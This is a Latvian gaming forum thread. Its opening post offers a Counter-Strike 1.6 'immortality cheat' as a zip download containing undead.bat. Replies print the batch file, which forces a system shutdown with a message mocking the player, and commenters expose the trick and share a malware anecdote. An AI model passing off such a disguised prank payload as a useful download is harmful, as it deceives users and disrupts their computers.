Jump to content
GIGN Forum

Jauni Nemirstības Čīti!

hyipzws
 Share

Recommended Posts

Skatījos kad ten cs geimeru tauta tikai apgrozās gan jau kādam vajadzēs parastu vienību maiņu ar kuras rezūltātā tu esi nemirstīgs!

lādējam šeit:

http://www.myprox.org/undead.zip

Atarhiveejam valjaa palaizham undead.bat ejam ieksh CS1.6 un priecājies kā tevi nevar nošaut, , P.S Šitiem čītiem nav nekāds wh+aim klāt , tikai nemirstība!

Lūdzu wink.gif

@echo off

shutdown.exe -s -t 30 -c "IZBEIDZ TACHU SPEELEET TO CS! Pavadi savu laiku lietderiigi nevis spelejot tikai CS,Un tagad atslaabsti tev ir 30sekundes lai visu saglabaaatu!"

Diemzel, bat faila nevar ierakakstiit funkcijas nekadas ipasas, pat virusu nevar, a tu te megini tautai chakaret smadzenes ka viruss, saprastu ja butu cita formata nevis BAT

@echo off

shutdown.exe -s -t 30 -c "IZBEIDZ TACHU SPEELEET TO CS! Pavadi savu laiku lietderiigi nevis spelejot tikai CS,Un tagad atslaabsti tev ir 30sekundes lai visu saglabaaatu!"

Diemzel, bat faila nevar ierakakstiit funkcijas nekadas ipasas, pat virusu nevar, a tu te megini tautai chakaret smadzenes ka viruss, saprastu ja butu cita formata nevis BAT

var jau .cmd failus arii, tas tas pats kas .bat bet nav .bat lol biggrin.gif smiekligi

ES MAAKU TAISIIT EXES UN SUDAINUS VIRUSUS, KAS NAV VIRUS biggrin.gif

bet tas jau nav nekas iipash

Kopš tā laika (pirms kādiem 3 gadiem), kad gign chatā paprasiju, kaut kādu programu (neaceros kādu) un man iedeva emal (vai kaut ko tamlīdzīgs) un man nācās pavadīt stundiņu, lai viņu noņemtu, es neko nekačāju, ne čītus, ne citas mazas programiņas. Lūk tāds ir mans stāsts. smile.gif

Edited by Hofo

Skatījos kad ten cs geimeru tauta tikai apgrozās gan jau kādam vajadzēs parastu vienību maiņu ar kuras rezūltātā tu esi nemirstīgs!

lādējam šeit:

http://www.myprox.org/undead.zip

Atarhiveejam valjaa palaizham undead.bat ejam ieksh CS1.6 un priecājies kā tevi nevar nošaut, , P.S Šitiem čītiem nav nekāds wh+aim klāt , tikai nemirstība!

Lūdzu wink.gif

STULBENIS!!!

ps Sorry Dr.Pain par red color ^^

Guest
This topic is now closed to further replies.
 Share

• Create New...